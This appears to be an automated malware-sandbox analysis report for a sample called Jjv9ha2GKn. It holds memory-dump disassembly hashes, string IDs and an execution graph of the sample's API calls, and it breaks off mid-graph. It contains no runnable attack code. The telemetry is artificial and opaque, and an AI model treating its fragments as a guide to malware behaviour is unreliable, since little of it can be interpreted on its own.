                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 418664d1da76c07045d11dba433e5a9dff899463981509179e2bf2e4a800760d
                                                                                                            • Instruction ID: 839679deea7bc6caa5de3862c0eaa2930d4d4cf40a4afd763505988f30b12962
                                                                                                            • Opcode Fuzzy Hash: 418664d1da76c07045d11dba433e5a9dff899463981509179e2bf2e4a800760d
                                                                                                            • Instruction Fuzzy Hash: 0D01B6B9600104CFCB14DFA8C584A9CBBF1EF49325F254195E915AB3A0C731ED81CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 84c7fd1281a9a5eb0ac8f9758ce0fb9b1bc22979524d625402ee8f07ed905acb
                                                                                                            • Instruction ID: a29b4a7f9aecdaec25ba3fd1af8156008f2cbc34124fec216a2ecfbcdc11fa65
                                                                                                            • Opcode Fuzzy Hash: 84c7fd1281a9a5eb0ac8f9758ce0fb9b1bc22979524d625402ee8f07ed905acb
                                                                                                            • Instruction Fuzzy Hash: B8F0F8B16147098FDB18CF68D482A9977E5FB4535872409AEF52ACF302E762E9038B84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b2aea0001c0235d6f04d12bda05eb1a813efd12bda74cb1025411f80bc9cdea6
                                                                                                            • Instruction ID: 776d1ecd5203f69d1910a3301cda15ce4eff6044d048e81ab49122cc676ecc86
                                                                                                            • Opcode Fuzzy Hash: b2aea0001c0235d6f04d12bda05eb1a813efd12bda74cb1025411f80bc9cdea6
                                                                                                            • Instruction Fuzzy Hash: F6E0923765052087C710EB98F8814B6B3E8EBCBA69318C056F61CCA611D733D826C3D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3abd2cf436af0f88c242e74d88d91f70b318453071c084282b97e05c77adf4f0
                                                                                                            • Instruction ID: 39d34755a755d7534dc0ab97e7a7cc9e8264ee78ccfcbe21007c4113ff598987
                                                                                                            • Opcode Fuzzy Hash: 3abd2cf436af0f88c242e74d88d91f70b318453071c084282b97e05c77adf4f0
                                                                                                            • Instruction Fuzzy Hash: A2F082B150D785CFC7039BB1A5282513FB0EF42605B1A40EBD899CB9A7C72CE895CB22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dc33b8e9bca7a17ae70e2b5f1d09af46c22e43ff7e65e9b9809a22ef39ba91c4
                                                                                                            • Instruction ID: a52cbe52d179212f47be4ab19578aaf487bd8038eadb59a30b7b33f6eae2969d
                                                                                                            • Opcode Fuzzy Hash: dc33b8e9bca7a17ae70e2b5f1d09af46c22e43ff7e65e9b9809a22ef39ba91c4
                                                                                                            • Instruction Fuzzy Hash: 16E02270214B489FDB24DF28E846B9A3BE8EB05308F140869F406CB201E761D8068B80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b9830c56c11ffef9ccc722a4c2dc4ae3223b43a4be8463bdd2386b5bd0b7f63a
                                                                                                            • Instruction ID: 1ce5dd1235625d570b816eabf577d5bd4773116b893f96f7a582676b77cfc0d3
                                                                                                            • Opcode Fuzzy Hash: b9830c56c11ffef9ccc722a4c2dc4ae3223b43a4be8463bdd2386b5bd0b7f63a
                                                                                                            • Instruction Fuzzy Hash: 59E0DF323042240BCB0022A9A4593AE7FBBCFD5351B080027F506C3382DE940D0143E5
                                                                                                            Memory Dump Source
                                                                                                            • String ID: A{]z$}\%G
                                                                                                            • API String ID: 0-4271377017
                                                                                                            • Opcode ID: dd6066bf50cdb1983ce0b9d1879007f6658cc4e9483a1dd85387779d258f7712
                                                                                                            • Instruction ID: adb4d8ad2049a46ec92c2881a26eaf1e64737e7cac30768dccdbb30583012d1e
                                                                                                            • Opcode Fuzzy Hash: dd6066bf50cdb1983ce0b9d1879007f6658cc4e9483a1dd85387779d258f7712
                                                                                                            • Instruction Fuzzy Hash: 34410AB0E1420A9FCF08CFAAC4815AEFBF6BB89300F24D42AC515E7254E73496438F95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: F
                                                                                                            • API String ID: 0-2945319695
                                                                                                            • Opcode ID: ce0a38f269f19f4699e5bed443099ed5ed092e462403e7c0c0eecaddb628728e
                                                                                                            • Instruction ID: 3070d82c4588b21ef821f43767cd2d80c489dab31f5660162681c53d9a24206a
                                                                                                            • Opcode Fuzzy Hash: ce0a38f269f19f4699e5bed443099ed5ed092e462403e7c0c0eecaddb628728e
                                                                                                            • Instruction Fuzzy Hash: 9D62C171F153158FCB15EBB8C89465DBBF2AF8A200F4185AAD04DE7391DE389C86CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: yS^Z
                                                                                                            • API String ID: 0-4128205011
                                                                                                            • Opcode ID: d6269c76a278219ee8191745d080866add6df546ffae6c2463ed0fced03644b6
                                                                                                            • Instruction ID: 4e414b7d2725b6cfeb1510c6f84844dfd874f1ba57b658ddfb2a9d8ae55a1c5f
                                                                                                            • Opcode Fuzzy Hash: d6269c76a278219ee8191745d080866add6df546ffae6c2463ed0fced03644b6
                                                                                                            • Instruction Fuzzy Hash: 9171D2B4D1420AEBCB48CF99C5808AEFBB6FF49310F159529D415AB264D334A982CF95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: yS^Z
                                                                                                            • API String ID: 0-4128205011
                                                                                                            • Opcode ID: 8f31a2bd2bcd84a927b89731314312db13d728f50c74d9737301253ffbbc405d
                                                                                                            • Instruction ID: 1170c71d10066c03a33e3485a58519035b26e23b1eaaf022a04a1cff5da7a8f5
                                                                                                            • Opcode Fuzzy Hash: 8f31a2bd2bcd84a927b89731314312db13d728f50c74d9737301253ffbbc405d
                                                                                                            • Instruction Fuzzy Hash: 5661F2B4E1420A9FCB48CFA9C5808AEFBB6BF49310F15856AD415E7261D330A982CF95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c0c64eca913f95733ef19ca44096d162b73cc9881db30d86cfa25a8447ea8f9
                                                                                                            • Instruction ID: fb40f5582460077b4a12a0e6a59651a0bc877ab2ee0df97dffd8ccb589f4d913
                                                                                                            • Opcode Fuzzy Hash: 2c0c64eca913f95733ef19ca44096d162b73cc9881db30d86cfa25a8447ea8f9
                                                                                                            • Instruction Fuzzy Hash: C4428D71F102198FDB14EBB8D89465EBBF2AFC9200F9185A9D04DA7354DE389C86CB52
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8ccb7e5fcde93ea3c726040eb7b6b53c3271de5ab33c56da8da4b5c5776e73aa
                                                                                                            • Instruction ID: 393b3836007dcf13101fcd48185895094b727803e134a44260ac6b15654f1954
                                                                                                            • Opcode Fuzzy Hash: 8ccb7e5fcde93ea3c726040eb7b6b53c3271de5ab33c56da8da4b5c5776e73aa
                                                                                                            • Instruction Fuzzy Hash: 0CC19BB17016018FEB29DB79C8507AE77EBAF8A300F2484AED1569B2D0DB35ED01C751
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9442b62147fa6238e19543d939d622349d9c32137b6e471158def6aafa63480b
                                                                                                            • Instruction ID: ebda806d2efeb74b1bdb53f30c02c4749ca10554056eba7780d6ab5ef36e4e1b
                                                                                                            • Opcode Fuzzy Hash: 9442b62147fa6238e19543d939d622349d9c32137b6e471158def6aafa63480b
                                                                                                            • Instruction Fuzzy Hash: 0AA1A270B002595FDF48ABB9845437F7AABAFC8710F1485A9A00AD7398CE38DD03C7A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d24b19c3513111b81e2133aaed47a2c6e357230451a79ddf08a08152b0c1c4f1
                                                                                                            • Instruction ID: 734ff7cd7c3c6c918f4d5837a1f773ddf95bf1a43ca74135d8008b045eee018f
                                                                                                            • Opcode Fuzzy Hash: d24b19c3513111b81e2133aaed47a2c6e357230451a79ddf08a08152b0c1c4f1
                                                                                                            • Instruction Fuzzy Hash: A71286B0C817468AE710CF66E98C2893BB1FB85318FD0CA19D9656F2E1D7B4156ECF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c6a62b49f2581da1085963b9a2833352f7c2e21812e933883132dfc545a57ea
                                                                                                            • Instruction ID: a29fe530602ec40f3425c639877f012ae4ec7fdfd681766bc7ec58caa84b972d
                                                                                                            • Opcode Fuzzy Hash: 0c6a62b49f2581da1085963b9a2833352f7c2e21812e933883132dfc545a57ea
                                                                                                            • Instruction Fuzzy Hash: 02D10A35D20B5A8ACB11EBB4D99069DB771FF96300F10C79AE50937254EF706AC9CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df433cb65cede08d02c2ecb4d210f01ebc9fbf5ab3a37941f841d87afbda93c7
                                                                                                            • Instruction ID: 9b17f5993c7d981413969f3dcc4abc973f99e243fae3a15de12da5052fca42fb
                                                                                                            • Opcode Fuzzy Hash: df433cb65cede08d02c2ecb4d210f01ebc9fbf5ab3a37941f841d87afbda93c7
                                                                                                            • Instruction Fuzzy Hash: 86A17432E006098FCF09DFB5C84459EBBB2FF85300B1585BAE906AB255DB35ED55CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a8a13da6ebe913384eab7a871980dbd9c37c11685fdcd3f5649450366c1b23d
                                                                                                            • Instruction ID: 9e30e711efac0acba053275f78fa2c696c39f4adac1598988a8e428c92747464
                                                                                                            • Opcode Fuzzy Hash: 1a8a13da6ebe913384eab7a871980dbd9c37c11685fdcd3f5649450366c1b23d
                                                                                                            • Instruction Fuzzy Hash: 59D10A35D20B5A8ACB11EB74D990A9DB771FF96300F10C79AE50937254EF706AC5CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: febbf7be4efa3a11a3f3a3e8983faeebc3af1ecf4323f03d049285413e51ef3e
                                                                                                            • Instruction ID: 030031a0f4265a8f7a92b7dc39d2b2f42484b6a609299315b81e41cd475b636b
                                                                                                            • Opcode Fuzzy Hash: febbf7be4efa3a11a3f3a3e8983faeebc3af1ecf4323f03d049285413e51ef3e
                                                                                                            • Instruction Fuzzy Hash: 3FB1F3B0E16219CFDB14CFA9D9446DDFBB2FB8A300F10992AD40ABB254D738A911CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf1bcb80c6dc58f4408c01f6473af68f476af0775f2a1cc37bcb4594afa81e19
                                                                                                            • Instruction ID: 6788422f8c698795471a120da672b431f4f1754c6fa92b5c2f20fba84f9252dc
                                                                                                            • Opcode Fuzzy Hash: cf1bcb80c6dc58f4408c01f6473af68f476af0775f2a1cc37bcb4594afa81e19
                                                                                                            • Instruction Fuzzy Hash: 0CD11931D10A5A8ACB11EB74D990A9DB7B1FF96300F10C79AE50937254EF706AC5CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd0ced8141e799f58479055e66ef56d61afc0c1df58ce1ae91d2aef0f5ecc069
                                                                                                            • Instruction ID: ec1db733eb3181b30a1a886ebf6c947a10b86ce997f6fb35ce097ae110c21156
                                                                                                            • Opcode Fuzzy Hash: bd0ced8141e799f58479055e66ef56d61afc0c1df58ce1ae91d2aef0f5ecc069
                                                                                                            • Instruction Fuzzy Hash: E3C108B1C817468AE710CF66E98C2897BB1FB85318F91CB19D9616F2E0DBB4146ECF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2b6ec3474c7ce730e80fa287f9b71ca01a17d7450b7f2f46069549ce9da4057d

Execution Graph

Execution Coverage: 4.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3%
Total number of Nodes: 1843
Total number of Limit Nodes: 33
408a2b 10819->10794 10821 4099fd 10820->10821 10822 4099de 10820->10822 10821->10792 10823 4099e8 DeleteCriticalSection 10822->10823 10823->10821 10823->10823 10829 409a02 10824->10829 10827 409c14 InitializeCriticalSectionAndSpinCount 10828 409bff 10827->10828 10828->10807 10830 409a23 10829->10830 10831 409a1f 10829->10831 10830->10831 10833 409a8b GetProcAddress 10830->10833 10834 409a7c 10830->10834 10836 409aa2 LoadLibraryExW 10830->10836 10831->10827 10831->10828 10833->10831 10834->10833 10835 409a84 FreeLibrary 10834->10835 10835->10833 10837 409ab9 GetLastError 10836->10837 10838 409ae9 10836->10838 10837->10838 10839 409ac4 ___vcrt_FlsFree 10837->10839 10838->10830 10839->10838 10840 409ada LoadLibraryExW 10839->10840 10840->10830 10842 409a02 ___vcrt_FlsFree 5 API calls 10841->10842 10843 409b07 10842->10843 10844 409b20 TlsAlloc 10843->10844 10845 408a20 10843->10845 10845->10819 10846 409b9e 10845->10846 10847 409a02 ___vcrt_FlsFree 5 API calls 10846->10847 10848 409bb8 10847->10848 10849 409bd3 TlsSetValue 10848->10849 10850 408a39 10848->10850 10849->10850 10850->10816 10851 408a49 10850->10851 10852 408a59 10851->10852 10853 408a53 10851->10853 10852->10819 10855 409b28 10853->10855 10856 409a02 ___vcrt_FlsFree 5 API calls 10855->10856 10857 409b42 10856->10857 10858 409b5a TlsFree 10857->10858 10859 409b4e 10857->10859 10858->10859 10859->10852 10861 41162d 10860->10861 10862 4075bd 10860->10862 10861->10862 10864 40f4cc 10861->10864 10862->10734 10862->10800 10865 40f4d8 ___scrt_is_nonwritable_in_current_image 10864->10865 10876 40f599 EnterCriticalSection 10865->10876 10867 40f4df 10877 410841 10867->10877 10870 40f4fd 10901 40f523 10870->10901 10876->10867 10878 41084d ___scrt_is_nonwritable_in_current_image 10877->10878 10879 410877 10878->10879 10880 410856 10878->10880 10904 40f599 EnterCriticalSection 10879->10904 10912 40dc32 10880->10912 10886 4108af 10917 4108d6 10886->10917 10888 410883 10888->10886 10905 410791 10888->10905 10890 40f366 
GetStartupInfoW 10891 40f417 10890->10891 10892 40f383 10890->10892 10896 40f41c 10891->10896 10892->10891 10893 410841 42 API calls 10892->10893 10894 40f3ab 10893->10894 10894->10891 10895 40f3db GetFileType 10894->10895 10895->10894 10900 40f423 10896->10900 10897 40f466 GetStdHandle 10897->10900 10898 40f4c8 10898->10870 10899 40f479 GetFileType 10899->10900 10900->10897 10900->10898 10900->10899 11110 40f5e1 LeaveCriticalSection 10901->11110 10903 40f50e 10903->10861 10904->10888 10920 40d8f2 10905->10920 10907 4107a3 10911 4107b0 10907->10911 10927 411472 10907->10927 10932 40dc45 10911->10932 10965 40f1cc GetLastError 10912->10965 10914 40dc37 10915 40db74 10914->10915 11029 40dac0 10915->11029 11109 40f5e1 LeaveCriticalSection 10917->11109 10919 40f4ee 10919->10870 10919->10890 10926 40d8ff _unexpected 10920->10926 10921 40d93f 10924 40dc32 ___std_exception_copy 13 API calls 10921->10924 10922 40d92a RtlAllocateHeap 10923 40d93d 10922->10923 10922->10926 10923->10907 10924->10923 10926->10921 10926->10922 10938 40c57b 10926->10938 10951 4112ae 10927->10951 10929 41148e 10930 4114ac InitializeCriticalSectionAndSpinCount 10929->10930 10931 411497 10929->10931 10930->10931 10931->10907 10933 40dc50 HeapFree 10932->10933 10937 40dc7a 10932->10937 10934 40dc65 GetLastError 10933->10934 10933->10937 10935 40dc72 __freea 10934->10935 10936 40dc32 ___std_exception_copy 12 API calls 10935->10936 10936->10937 10937->10888 10941 40c5a7 10938->10941 10942 40c5b3 ___scrt_is_nonwritable_in_current_image 10941->10942 10947 40f599 EnterCriticalSection 10942->10947 10944 40c5be CallUnexpected 10948 40c5f5 10944->10948 10947->10944 10949 40f5e1 CallUnexpected LeaveCriticalSection 10948->10949 10950 40c586 10949->10950 10950->10926 10952 4112de 10951->10952 10956 4112da _unexpected 10951->10956 10952->10956 10957 4111e3 10952->10957 10955 4112f8 GetProcAddress 10955->10956 10956->10929 10963 4111f4 ___vcrt_FlsFree 10957->10963 10958 41128a 10958->10955 10958->10956 10959 
411212 LoadLibraryExW 10960 411291 10959->10960 10961 41122d GetLastError 10959->10961 10960->10958 10962 4112a3 FreeLibrary 10960->10962 10961->10963 10962->10958 10963->10958 10963->10959 10964 411260 LoadLibraryExW 10963->10964 10964->10960 10964->10963 10966 40f1e2 10965->10966 10967 40f1e8 10965->10967 10988 4113f1 10966->10988 10971 40f1ec SetLastError 10967->10971 10993 411430 10967->10993 10971->10914 10973 40d8f2 _unexpected 12 API calls 10974 40f219 10973->10974 10975 40f221 10974->10975 10976 40f232 10974->10976 10977 411430 _unexpected 6 API calls 10975->10977 10978 411430 _unexpected 6 API calls 10976->10978 10979 40f22f 10977->10979 10980 40f23e 10978->10980 10985 40dc45 __freea 12 API calls 10979->10985 10981 40f242 10980->10981 10982 40f259 10980->10982 10984 411430 _unexpected 6 API calls 10981->10984 10998 40eea9 10982->10998 10984->10979 10985->10971 10987 40dc45 __freea 12 API calls 10987->10971 10989 4112ae _unexpected 5 API calls 10988->10989 10990 41140d 10989->10990 10991 411416 10990->10991 10992 411428 TlsGetValue 10990->10992 10991->10967 10994 4112ae _unexpected 5 API calls 10993->10994 10995 41144c 10994->10995 10996 40f204 10995->10996 10997 41146a TlsSetValue 10995->10997 10996->10971 10996->10973 11003 40ed3d 10998->11003 11004 40ed49 ___scrt_is_nonwritable_in_current_image 11003->11004 11017 40f599 EnterCriticalSection 11004->11017 11006 40ed53 11018 40ed83 11006->11018 11009 40ee4f 11010 40ee5b ___scrt_is_nonwritable_in_current_image 11009->11010 11021 40f599 EnterCriticalSection 11010->11021 11012 40ee65 11022 40f030 11012->11022 11014 40ee7d 11026 40ee9d 11014->11026 11017->11006 11019 40f5e1 CallUnexpected LeaveCriticalSection 11018->11019 11020 40ed71 11019->11020 11020->11009 11021->11012 11023 40f03f _unexpected 11022->11023 11024 40f066 _unexpected 11022->11024 11023->11024 11025 410e92 _unexpected 14 API calls 11023->11025 11024->11014 11025->11024 11027 40f5e1 CallUnexpected LeaveCriticalSection 11026->11027 11028 40ee8b 
11027->11028 11028->10987 11030 40dad2 ___std_exception_copy 11029->11030 11035 40daf7 11030->11035 11036 40db07 11035->11036 11037 40db0e 11035->11037 11050 40b610 GetLastError 11036->11050 11042 40daea 11037->11042 11054 40d94f 11037->11054 11040 40db43 11040->11042 11057 40db84 IsProcessorFeaturePresent 11040->11057 11044 40b4a0 11042->11044 11043 40db73 11045 40b4ac 11044->11045 11046 40b4c3 11045->11046 11089 40b660 11045->11089 11048 40b4d6 11046->11048 11049 40b660 ___std_exception_copy 41 API calls 11046->11049 11049->11048 11051 40b629 11050->11051 11061 40f27d 11051->11061 11055 40d973 11054->11055 11056 40d95a GetLastError SetLastError 11054->11056 11055->11040 11056->11040 11058 40db90 11057->11058 11083 40d978 11058->11083 11062 40f290 11061->11062 11065 40f296 11061->11065 11063 4113f1 _unexpected 6 API calls 11062->11063 11063->11065 11064 411430 _unexpected 6 API calls 11066 40f2b0 11064->11066 11065->11064 11067 40b645 SetLastError 11065->11067 11066->11067 11068 40d8f2 _unexpected 14 API calls 11066->11068 11067->11037 11069 40f2c0 11068->11069 11070 40f2c8 11069->11070 11071 40f2dd 11069->11071 11072 411430 _unexpected 6 API calls 11070->11072 11073 411430 _unexpected 6 API calls 11071->11073 11074 40f2d4 11072->11074 11075 40f2e9 11073->11075 11079 40dc45 __freea 14 API calls 11074->11079 11076 40f2fc 11075->11076 11077 40f2ed 11075->11077 11078 40eea9 _unexpected 14 API calls 11076->11078 11080 411430 _unexpected 6 API calls 11077->11080 11081 40f307 11078->11081 11079->11067 11080->11074 11082 40dc45 __freea 14 API calls 11081->11082 11082->11067 11084 40d994 CallUnexpected 11083->11084 11085 40d9c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11084->11085 11088 40da91 CallUnexpected 11085->11088 11086 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11087 40daaf GetCurrentProcess TerminateProcess 11086->11087 11087->11043 11088->11086 11090 40b66e GetLastError 11089->11090 11091 40b6af 11089->11091 11092 
40b67d 11090->11092 11091->11046 11093 40f27d ___std_exception_copy 14 API calls 11092->11093 11094 40b69a SetLastError 11093->11094 11094->11091 11095 40b6b6 11094->11095 11098 40d79d 11095->11098 11099 411788 CallUnexpected EnterCriticalSection LeaveCriticalSection 11098->11099 11100 40d7a2 11099->11100 11101 40d7ad 11100->11101 11102 4117cd CallUnexpected 40 API calls 11100->11102 11103 40d7b7 IsProcessorFeaturePresent 11101->11103 11104 40d7d6 11101->11104 11102->11101 11106 40d7c3 11103->11106 11105 40d0b6 CallUnexpected 21 API calls 11104->11105 11107 40d7e0 11105->11107 11108 40d978 CallUnexpected 8 API calls 11106->11108 11108->11104 11109->10919 11110->10903 11112 4079ac GetStartupInfoW 11111->11112 11112->10740 11114 40140f 11113->11114 11117 401022 11113->11117 11114->10743 11115 401053 lstrcmpA 11116 4010b0 GetProcessHeap HeapAlloc 11115->11116 11115->11117 11119 401100 __InternalCxxFrameHandler 11116->11119 11117->11114 11117->11115 11118 4010e4 lstrlenA 11118->11119 11119->11117 11119->11118 11120 401216 GetProcessHeap HeapAlloc 11119->11120 11121 4012c8 GetProcessHeap HeapAlloc 11120->11121 11122 40125d __InternalCxxFrameHandler 11120->11122 11184 409c70 11121->11184 11122->11121 11123 401260 GetProcessHeap HeapAlloc 11122->11123 11123->11122 11125 401305 GetProcessHeap HeapAlloc 11126 409c70 __InternalCxxFrameHandler 11125->11126 11127 401351 GetProcessHeap HeapAlloc 11126->11127 11128 40139d __InternalCxxFrameHandler 11127->11128 11129 401400 __InternalCxxFrameHandler 11128->11129 11130 4013c9 GetProcessHeap HeapAlloc 11128->11130 11129->10743 11130->11129 11132 401847 11131->11132 11156 401479 11131->11156 11322 406f60 11132->11322 11134 40164e lstrcatW 11138 40176d 11134->11138 11135 401854 11135->10747 11135->10755 11140 401775 GetCurrentProcess OpenProcessToken 11138->11140 11141 40183b GetProcessHeap HeapFree 11138->11141 11139 4014a8 Sleep 11142 4014bf 11139->11142 11139->11156 11144 401797 GetTokenInformation CloseHandle 11140->11144 11145 
